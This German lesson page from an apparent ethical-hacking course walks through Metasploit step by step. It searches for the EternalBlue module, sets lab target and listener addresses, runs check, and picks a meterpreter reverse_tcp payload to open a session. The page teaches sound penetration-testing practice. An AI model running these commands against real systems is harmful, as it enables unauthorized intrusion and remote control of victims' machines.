0Pricing
Ethical Hacking Academy · Lektion

Exploits suchen und verwenden

Finden und ausführen

Exploits suchen und verwenden ist eine kostenlose Ethical Hacking Academy-Lektion auf CoddyKit. Dies ist Lektion 2 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Ethical Hacking Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.

Von der Aufklärung zum Exploit

Nach dem Scannen kennen Sie die Dienste und Versionen des Ziels. Der nächste Schritt besteht darin, ein Exploit-Modul zu finden, das zu einer bekannten Schwachstelle in diesen Versionen passt.

Der Metasploit-Befehl search ist Ihr Zugang zu Tausenden von Modulen. Präzises Suchen spart Zeit und verhindert, dass Sie den falschen Code ausführen.

Grundlegende Suche

Der Befehl search durchsucht den Modulindex anhand eines Schlüsselworts. Sie können nach einem Softwarenamen, einer CVE oder einem Dienst suchen.

search eternalblue
search type:exploit platform:windows smb

Suchfilter

Verfeinern Sie die Ergebnisse mit Filtern:

  • type: exploit, auxiliary, post.
  • platform: windows, linux, unix.
  • cve: eine bestimmte CVE-Kennung.
  • rank: excellent, great, good (Zuverlässigkeit).

Durch die Kombination von Filtern lässt sich die Auswahl aus Tausenden von Modulen schnell auf eine Handvoll eingrenzen.

search cve:2017-0144 type:exploit

Suchausgabe lesen

Die Suchergebnisse führen jedes Modul mit einem Rang, einem Veröffentlichungsdatum und einer check-Anzeige auf. Der Rang gibt die Zuverlässigkeit und Sicherheit des Exploits an.

  • excellent: Das Ziel stürzt wahrscheinlich nicht ab.
  • great/good: Unter üblichen Bedingungen zuverlässig.
  • low/manual: Riskant oder erfordert eine sorgfältige Einrichtung.

Bevorzugen Sie Module mit höherem Rang, um den Absturz von Produktionssystemen zu vermeiden.

Ein Modul laden

Verwenden Sie die Indexnummer oder den vollständigen Pfad des Moduls mit use. Die Eingabeaufforderung ändert sich und zeigt das geladene Modul an; außerdem enthält der Datenspeicher nun die Optionen dieses Moduls.

use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >

Das Modul prüfen

Lesen Sie vor der Ausführung die Informationen zum Modul. info zeigt die Beschreibung, Referenzen (CVEs, Advisories), erforderliche Optionen und unterstützte Ziele an.

Zu verstehen, was ein Modul tut, gehört zu einer professionellen und verantwortungsvollen Nutzung. Lösen Sie niemals einen Exploit aus, den Sie nicht verstehen.

info
show options
show targets

Optionen festlegen

Konfigurieren Sie die erforderlichen Optionen mit set. Bei einem Remote-Exploit sind dies häufig die Zieladresse und die Einstellungen für Ihren Payload.

set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2

Der Befehl check

Viele Exploits unterstützen check. Damit wird sicher geprüft, ob das Ziel vermutlich verwundbar ist, ohne es tatsächlich zu kompromittieren.

check zuerst auszuführen, ist eine gute Vorgehensweise: Dadurch verringern Sie das Risiko, ein System zum Absturz zu bringen, und stellen sicher, dass Sie Ihre Zeit auf eine tatsächliche Möglichkeit verwenden.

check
# [+] 10.10.10.40:445 - The target is vulnerable.

Den Payload auswählen

Ein Exploit benötigt einen Payload. Metasploit wählt standardmäßig einen aus, Sie können jedoch geeignete Payloads auflisten und einen auswählen, der zum Ziel und zu Ihren Zugriffsanforderungen passt.

show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Ausführung und Sessions

Starten Sie den Exploit mit exploit (oder run). Bei Erfolg erhalten Sie eine Session, also eine interaktive Verbindung zum Ziel.

Verwalten Sie mehrere Sessions mit sessions -l, um sie aufzulisten, und mit sessions -i N, um mit einer Session zu interagieren. Mit background verschieben Sie eine Session in den Hintergrund und können in der Konsole weiterarbeiten.

exploit
sessions -l
sessions -i 1

Globale Optionen und Moduloptionen

Einige Einstellungen wie LHOST werden in vielen Modulen wiederverwendet. Legen Sie sie mit setg global fest, damit Sie sie beim Wechseln zwischen Modulen nicht jedes Mal erneut eingeben müssen.

  • set: gilt nur für das aktuelle Modul.
  • setg: gilt global für alle Module.
  • unsetg: löscht einen globalen Wert.

Das spart bei langen Einsätzen mit vielen Modulen Zeit.

setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40

Schnelltest

Wählen Sie den verantwortungsvollen Schritt aus, bevor Sie einen Exploit auslösen.

Zusammenfassung

Sie haben gelernt, Exploits zu finden und auszuführen:

  • Verwenden Sie search mit Filtern (Typ, Plattform, cve, Rang), um Module zu finden.
  • Bevorzugen Sie Module mit einem höheren Rang, da sie zuverlässiger und sicherer sind.
  • Mit use laden, mit info/show options prüfen und mit set konfigurieren.
  • Führen Sie zuerst check und anschließend exploit aus, um eine Session zu erhalten.
  • Verwalten Sie Sessions mit sessions -l/-i.

Als Nächstes: Payloads und die Post-Exploitation-Shell Meterpreter.

Häufig gestellte Fragen

Ist die Lektion „Exploits suchen und verwenden“ kostenlos?

Ja — der vollständige Text von „Exploits suchen und verwenden“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Ethical Hacking Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „Exploits suchen und verwenden“?

Finden und ausführen Du übst Ethical Hacking Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Ethical Hacking Academy zu starten?

Keine Vorkenntnisse erforderlich. Ethical Hacking Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 2 von 4.

Wie lange dauert die Lektion „Exploits suchen und verwenden“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Ethical Hacking Academy-Lektion Code schreiben und ausführen?

Ja. Jede Ethical Hacking Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. Metasploit-Architektur
  2. Exploits suchen und verwenden
  3. Payloads und Meterpreter
  4. Post-Exploitation-Module
← Zurück zu Ethical Hacking Academy